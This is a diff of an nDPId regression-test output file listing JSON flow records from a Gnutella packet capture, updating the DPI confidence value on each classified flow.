-00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"71.237.202.91","src_port":28681,"dst_port":16117,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.117.249.98","src_port":28681,"dst_port":6815,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":101162,"flow_last_seen":177309,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":95216,"flow_last_seen":162802,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.201.208.57","src_port":28681,"dst_port":38617,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95264,"flow_last_seen":176255,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95754,"flow_last_seen":139756,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.217.84.16","src_port":28681,"dst_port":20223,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":101837,"flow_last_seen":251767,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95443,"flow_last_seen":176562,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.240.69.199","src_port":28681,"dst_port":6348,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00792{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.219","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"71.237.202.91","src_port":28681,"dst_port":16117,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.117.249.98","src_port":28681,"dst_port":6815,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":101162,"flow_last_seen":177309,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":95216,"flow_last_seen":162802,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.201.208.57","src_port":28681,"dst_port":38617,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95264,"flow_last_seen":176255,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95754,"flow_last_seen":139756,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.217.84.16","src_port":28681,"dst_port":20223,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":101837,"flow_last_seen":251767,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95443,"flow_last_seen":176562,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.240.69.199","src_port":28681,"dst_port":6348,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":93714,"flow_last_seen":253026,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.249.63.200","src_port":28681,"dst_port":22582,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95784,"flow_last_seen":139896,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95715,"flow_last_seen":139730,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95264,"flow_last_seen":179735,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":40137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.28.53.225","src_port":28681,"dst_port":44859,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95893,"flow_last_seen":251793,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1751,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95923,"flow_last_seen":139892,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.250.179.237","src_port":28681,"dst_port":20848,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95784,"flow_last_seen":139889,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95716,"flow_last_seen":139781,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95893,"flow_last_seen":123936,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":101122,"flow_last_seen":168840,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2737,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.64.44.11","src_port":28681,"dst_port":1352,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"100.1.231.138","src_port":28681,"dst_port":56558,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95784,"flow_last_seen":146329,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":95716,"flow_last_seen":243760,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95784,"flow_last_seen":139896,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95715,"flow_last_seen":139730,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 